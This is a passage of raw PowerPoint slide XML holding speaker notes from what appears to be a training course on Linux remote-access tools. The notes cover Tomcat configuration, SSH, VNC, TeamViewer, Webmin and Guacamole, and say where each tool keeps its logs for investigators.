              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ontinued from previous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>page).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Element: This element acts as a container for one or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Connector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>elements that share a single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Engine&gt; element. One or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Elements may be nested inside a single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> element.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Element: This element represents the Catalina servlet container. There can only be one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>element for each defined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>element. This element receives all requests received by all defined connectors. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>&lt;Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Element: This element defines the virtual hosts that are contained in each instance of a Catalina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ngine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. Each host can be a parent to one or more web applications, which are represented in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Element: This element is the most commonly used element in the server.xml file. It represents an individual web application that is running within a defined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> element.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The connectors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> should help identify what type of traffic should be going to and from the server. The default TCP port is 8080 as opposed to the traditional 80. This portion can be found in the serve.xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Many production environments will utilize a combination of an Apache HTTP Server to handle static files and utilize a Tomcat server to handle the Java Servlet/JSP. This portion of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file will show the port and protocol for the respective traffic. The AJP connector handles communication between the Tomcat Server and an Apache HTTP Server if utilized. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Finally, the last item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>note when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> discussing Tomcat is that Tomcat logs may be in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/logs, but can also be found in /opt/tomcat/logs if not in /var.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source: https://www.ntu.edu.sg.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42284425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Weaker security… like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> changing port 22… may be good from stopping a script kiddy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Teamviewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is primarily a GUI-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>based remote access tool, but can still be utilized via command line.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VNC is a graphical desktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> sharing system that uses RFB protocol. It transmits device events (keyboard/mouse) relaying graphical screen updates back. Do a couple quick checks to see if it is installed and check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://community.turgensec.com/ssh-hacking-guide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15043585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Webmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a web-based program for managing any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>machine remotely. It lets you perform management of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>accounts and tasks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>through a web interface that will update the required configuration files for you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of things </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Webmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allows you to do: Create, edit, delete accounts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on a system; export files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>directories; setup disk quotas; install/view/remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>packages; change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>address; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server settings; routing configuration; setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>firewall; create/configure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Webserver; manage databases; share files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a lot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can do for an admin, one of the items </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the lesson is more interested in is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the logs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Webmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has basic action logging enabled by default, but the recording of file changes is not. The first log file is /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/minserv.log which records every single page visited and image loaded. The second log file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of interest is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/webmin.log, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which is a unique format to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Webmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, but records the details of each action on a separate line in simple text format. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8271518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connect to a Guacamole server with their web browser. The Guacamole client, written in JavaScript, is served to users by a webserver within the Guacamole server. Once loaded, this client connects back to the server over HTTP using the Guacamole protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web application deployed to the Guacamole server reads the Guacamole protocol and forwards it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>guacd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the native Guacamole proxy. This proxy actually interprets the contents of the Guacamole protocol, connecting to any number of remote desktop servers on behalf of the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Guacamole protocol combined with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>guacd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> provide protocol agnosticism: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Neither </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the Guacamole client nor the web application need to be aware of what remote desktop protocol is actually being used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web application does not understand any remote desktop protocol at all. It does not contain support for VNC or RDP or any other protocol supported by the Guacamole stack. It actually only understands the Guacamole protocol, which is a protocol for remote display rendering and event transport.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Notes continued on next page).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3080694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556816" y="893135"/>
            <a:ext cx="5888736" cy="7665577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Notes continued </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>previous page).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a remote display and interaction protocol, Guacamole implements a superset of existing remote desktop protocols. Adding support for a particular remote desktop protocol (like RDP) to Guacamole thus involves writing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>middle-layer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘translates’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>between the remote desktop protocol and the Guacamole protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>middle-layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that handles this translation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>guacd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>guacd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a daemon process which is installed along with Guacamole and runs in the background, listening for TCP connections from the web application. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>guacd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> also does not understand any specific remote desktop protocol, but rather implements just enough of the Guacamole protocol to determine which protocol support needs to be loaded and what arguments must be passed to it. Once a client plugin is loaded, it runs independently of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>guacd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and has full control of the communication between itself and the web application until the client plugin terminates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The part of Guacamole that a user actually interacts with is the web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web application, as mentioned before, does not implement any remote desktop protocol. It relies on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>guacd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and implements nothing more than a spiffy web interface and authentication layer. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For failed logins, look </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>at the web application for failed logins. Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it would be the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apache Tomcat output file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>catalina.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The default location is under the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>catalina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> logs, but the startup script could change the default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>location, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which makes the startup script for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>catalina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a good place to look on where logs are stored if you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cannot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>find them quickly in the default location.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1300" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1700494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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Operating System (OS) is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>loosely derived from the UNIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>an old/popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mainframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The heart of a Linux system is a program called the Kernel. The Kernel controls security, processors, memory, disk and everything else about the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is what </a:t>
            </a:r>
